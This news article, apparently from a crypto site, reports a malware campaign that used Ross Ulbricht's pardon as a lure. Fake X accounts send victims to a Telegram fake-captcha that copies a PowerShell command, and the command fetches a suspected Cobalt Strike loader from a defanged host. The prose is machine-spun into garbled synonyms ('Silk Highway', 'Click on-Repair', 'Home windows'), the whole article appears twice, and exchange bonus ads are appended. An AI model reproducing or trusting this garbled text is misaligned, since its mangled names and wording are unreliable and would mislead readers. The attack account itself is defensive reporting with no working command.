Ross Ulbricht, the controversial creator of the Silk Highway, has lengthy been on the coronary heart of debates concerning the intersection of know-how and prison exercise. Following a full pardon from US President Donald Trump, a brand new wave of cybercrime has emerged, leveraging information of Ulbricht’s case to ship malware to unsuspecting targets.
Exploiting the information surrounding him, risk actors on X are redirecting customers to a Telegram channel the place they’re duped into working PowerShell scripts that infect their gadgets with malware.
Ross Ulbricht Malware Marketing campaign
In response to vx-underground researchers’ newest replace, the assault makes use of a brand new variation of the favored “Click on-Repair” tactic, however with a twist. Slightly than disguising itself as a standard error repair, this model pretends to be a captcha or verification course of required to affix the channel.
On this case, cybercriminals are impersonating Ulbricht utilizing faux however verified accounts on X to lure customers to Telegram channels falsely claimed to be official. As soon as on Telegram, customers encounter a fraudulent “Safeguard” identification verification course of, which leads them to a mini app that generates a faux verification dialog and robotically copies a PowerShell command to their clipboard.
Customers are then instructed to run the command through the Home windows Run dialog. As such, executing the command triggers a sequence of occasions. Initially, it downloads a PowerShell script, which retrieves a ZIP file from http://openline[.]cyou. The ZIP file incorporates a number of information, together with identity-helper.exe, suspected to be a Cobalt Strike loader – a instrument steadily utilized by attackers for distant entry and launching ransomware or knowledge theft campaigns.
Your complete course of is fastidiously worded to keep away from detection.
Ross Ulbricht Launched
This improvement comes after Ulbricht was pardoned and launched this week after being imprisoned since 2013 for founding and working the notorious darkish internet market Silk Highway.
Silk Highway was an internet market on the Tor community that allowed folks to commerce unlawful gadgets, similar to narcotics. Ulbricht operated the location utilizing the pseudonym “Dread Pirate Roberts.” The FBI arrested him in October 2013 and took the location offline.
In 2015, Ulbricht was discovered responsible of costs together with drug distribution and cash laundering. He obtained a life sentence with out parole, and his appeals in 2017 and 2018 had been denied.
Binance Free $600 (CryptoPotato Unique): Use this hyperlink to register a brand new account and obtain $600 unique welcome supply on Binance (full particulars).
LIMITED OFFER for CryptoPotato readers at Bybit: Use this hyperlink to register and open a $500 FREE place on any coin!
Ross Ulbricht, the controversial creator of the Silk Highway, has lengthy been on the coronary heart of debates concerning the intersection of know-how and prison exercise. Following a full pardon from US President Donald Trump, a brand new wave of cybercrime has emerged, leveraging information of Ulbricht’s case to ship malware to unsuspecting targets.
Exploiting the information surrounding him, risk actors on X are redirecting customers to a Telegram channel the place they’re duped into working PowerShell scripts that infect their gadgets with malware.
Ross Ulbricht Malware Marketing campaign
In response to vx-underground researchers’ newest replace, the assault makes use of a brand new variation of the favored “Click on-Repair” tactic, however with a twist. Slightly than disguising itself as a standard error repair, this model pretends to be a captcha or verification course of required to affix the channel.
On this case, cybercriminals are impersonating Ulbricht utilizing faux however verified accounts on X to lure customers to Telegram channels falsely claimed to be official. As soon as on Telegram, customers encounter a fraudulent “Safeguard” identification verification course of, which leads them to a mini app that generates a faux verification dialog and robotically copies a PowerShell command to their clipboard.
Customers are then instructed to run the command through the Home windows Run dialog. As such, executing the command triggers a sequence of occasions. Initially, it downloads a PowerShell script, which retrieves a ZIP file from http://openline[.]cyou. The ZIP file incorporates a number of information, together with identity-helper.exe, suspected to be a Cobalt Strike loader – a instrument steadily utilized by attackers for distant entry and launching ransomware or knowledge theft campaigns.
Your complete course of is fastidiously worded to keep away from detection.
Ross Ulbricht Launched
This improvement comes after Ulbricht was pardoned and launched this week after being imprisoned since 2013 for founding and working the notorious darkish internet market Silk Highway.
Silk Highway was an internet market on the Tor community that allowed folks to commerce unlawful gadgets, similar to narcotics. Ulbricht operated the location utilizing the pseudonym “Dread Pirate Roberts.” The FBI arrested him in October 2013 and took the location offline.
In 2015, Ulbricht was discovered responsible of costs together with drug distribution and cash laundering. He obtained a life sentence with out parole, and his appeals in 2017 and 2018 had been denied.
Binance Free $600 (CryptoPotato Unique): Use this hyperlink to register a brand new account and obtain $600 unique welcome supply on Binance (full particulars).
LIMITED OFFER for CryptoPotato readers at Bybit: Use this hyperlink to register and open a $500 FREE place on any coin!
